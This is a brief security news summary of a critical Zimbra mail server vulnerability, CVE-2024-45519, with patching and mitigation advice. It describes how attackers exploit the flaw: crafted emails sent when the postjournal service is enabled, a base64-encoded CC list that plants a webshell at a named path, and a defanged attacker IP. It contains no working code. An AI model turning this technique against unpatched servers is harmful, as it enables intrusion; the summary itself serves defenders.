Summary:
-
Critical Vulnerability Discovered
Researchers have identified a critical vulnerability (CVE-2024-45519) in Zimbra mail servers that allows attackers to execute malicious commands remotely, potentially installing a backdoor on affected systems. -
Exploitation Details
The vulnerability can be exploited when administrators manually enable the postjournal service. Attackers can send specially crafted emails to addresses hosted on the server to execute harmful commands. -
Mass Exploitation Reported
Security researcher Ivan Kwiatkowski reported ongoing mass exploitation of this vulnerability, with malicious emails originating from the IP address 79.124.49[.]86, attempting to run files via the curl tool. -
Malicious Email Tactics
The attackers used a CC list encoded in base64, which when decoded created a webshell on vulnerable Zimbra servers at the path: /jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp. This webshell can listen for connections and execute commands based on received cookies. -
Recommended Actions
Zimbra has released a patch for this vulnerability, and all users are urged to apply it. At a minimum, administrators should ensure that the postjournal service is disabled to mitigate risk.
Read more at: Ars Technica | Zimbra Security Advisories
!